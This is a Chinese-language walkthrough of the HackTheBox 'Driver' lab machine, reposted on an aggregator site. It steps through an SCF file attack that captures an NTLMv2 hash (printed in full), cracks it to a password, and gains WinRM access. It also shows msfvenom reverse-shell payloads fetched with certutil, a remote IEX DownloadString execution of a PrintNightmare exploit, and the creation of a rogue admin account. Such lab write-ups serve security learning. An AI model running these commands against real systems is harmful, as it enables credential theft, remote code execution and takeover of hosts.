ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

hackthebox Driver wp

2021-11-18 00:00:40  阅读:371  来源: 互联网

标签:尝试 16.11 exe Driver winrm hackthebox https wp 10.10


目标:10.10.11.106

首先端口扫描

rustscan -b 500 -a 10.10.11.106

在这里插入图片描述

开放了445端口,尝试利用smbclient进行匿名连接

smbclient -L 10.10.11.106

在这里插入图片描述

接着使用部分弱口令进行尝试,失败

smbclient -L 10.10.11.106 -U admin%password

接着访问80端口,利用admin/admin成功进入,经过翻阅,找打一处文件上传
在这里插入图片描述

尝试上传shell,不过没有上传后的地址,放弃这个办法,此时仔细看看这句英文,大概意思就是会上传到一个文件共享目录

在这里插入图片描述

所以便可以尝试利用smb下的SCF File Attacks

参考:https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

首先本地写上scf文件

[(img-OGrUpYM6-1637162229178)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a57d361e-7447-4f0c-b973-b9f33767a0e0/Untitled.png)]

[Shell]
Command=2
IconFile=\\10.10.16.11\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

接着kali设置reponse

responder -wrf -I tun0

在这里插入图片描述

等待受害者浏览共享文件时本地会接收到hash

tony::DRIVER:461fbfd7a35f9cb6:A3F711C5FE41B0EBED75AC1B3ABEA8C5:010100000000000080A2438866DBD70138ACB8F116FA712D00000000020008004E0046004400510001001E00570049004E002D00450046004E005500510054004B004D00460059004C0004003400570049004E002D00450046004E005500510054004B004D00460059004C002E004E004600440051002E004C004F00430041004C00030014004E004600440051002E004C004F00430041004C00050014004E004600440051002E004C004F00430041004C000700080080A2438866DBD7010600040002000000080030003000000000000000000000000020000095B7C01109A64478769C0BE0C98A7A5CCD0E0D050E2D6221B2AE94288E600F060A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003100000000000000000000000000

lm2
这里顺带提一下ntlm v2的格式是:

username::domain:server challenge:HMAC:NTLMv2 Response 去除HMAC的剩下部分

接下来使用hashcat进行解密

hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt -o password.txt

解密成功,获取密码为liltony

在这里插入图片描述

这里需要get一个新知识点,winrm

参考:https://pentestlab.blog/2018/05/15/lateral-movement-winrm/

由于端口扫描发现winrm 5985端口开放,则使用evil-winrm 进行尝试

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9DZWpxd6-1637162229188)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/381ebd58-4e61-4b8b-8424-226ba19f4783/Untitled.png)]

(img-x9Visa9L-1637162229193)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/464b8c33-89b1-4830-b739-e44a00b4e048/Untitled.png)]

下一步便是提权了,这里首先尝试msf上线吗,但是现在问题是如何将文件下载,经过百度,此时发现了新大陆,certutil.exe 这是Windows 操作系统上预装的工具,可用于 校验文件MD5、SHA1、SHA256,下载恶意文件和免杀。

我们可以使用

certutil.exe -urlcache -f url 进行下载文件

本地生成木马文件test.exe后,利用python启动临时http服务来提供下载

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.11 LPORT=7777 -f exe -o test.exe
python3 -m  http.server  

接着目标主机执行

certutil.exe -urlcache -f http://10.10.16.11:8000/test.exe test.exe

在这里插入图片描述
执行木马程序后可以看到msf已经上线
在这里插入图片描述

尝试getsystem失败,尝试令牌窃取等方式同样失败

在这里插入图片描述
接下来就得考虑其他方式提权了

看到网站80大概率是一个打印机服务,首先看看具体是什么

在这里插入图片描述
正好此时通过搜索找到今年一个新的打印机(print spooler)漏洞CVE-2021-1675
exp地址:
exp1(python版本):https://github.com/cube0x0/CVE-2021-1675
exp2(ps1版本): https://github.com/calebstewart/CVE-2021-1675

最开始利用python版本进行攻击,流程如下,首先根据其提示更换impacket
在这里插入图片描述然后再攻击机上设置smb配置
在这里插入图片描述
然后攻击机上tmp目录下生成payload并开启smb

msfvenom -p windows/shell/reverse_tcp lhost=10.10.16.11 lport=7777 -f dll > carl.dll

在这里插入图片描述接着使用exp并监听777端口

python3 CVE-2021-1675.py driver/tony:liltony@10.10.11.106 "\\10.10.16.11\tmp\vonom.dll"

很遗憾出现了如下错误,已经在github上提交了issue,等大佬帮忙解答吧
在这里插入图片描述
那么便使用第二个powershell脚本exp吧,老样子本地开始http服务,evil-winrm上,也就是受害主机上执行

IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.11:8000/CVE-2021-1675.p s1')

由于通过evil-winrm获取的是powershell,所以使用上述命令直接远程执行脚本(这里尝试过先把脚本下载到受害机器上执行,但是失败了)
远程执行powershell脚本后通过exp的攻击代码添加用户名为carl,密码123的本地管理员账户

Invoke-Nightmare -NewUser "carl" -NewPassword "123"

在这里插入图片描述
最后用evil-winrm使用新账户登录即可获取权限


最后和刚接触hackthebox的同学说下关于连接hackthebox的靶机网络问题我是怎么解决的,首先在htb上下载vpn配置,我放到了我的虚拟机kali中运行,这是为了方便反弹shell等功能,接着使用ssh 进行socks5代理转发使我的物理机也能访问靶机,命令为

ssh -D 7777 carl@192.168.31.128 -N

这条命令的意思便是当我访问本地7777端口时,请求流量会转到我的kali虚拟机192.168.31.128上,我的kali上运行着靶机vpn,那么便实现了流量转发,如果有师傅有更好的解决物理机和虚拟机共同访问vpn的问题,欢迎分享。

标签:尝试,16.11,exe,Driver,winrm,hackthebox,https,wp,10.10
来源: https://blog.csdn.net/qq_26771915/article/details/121390438

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有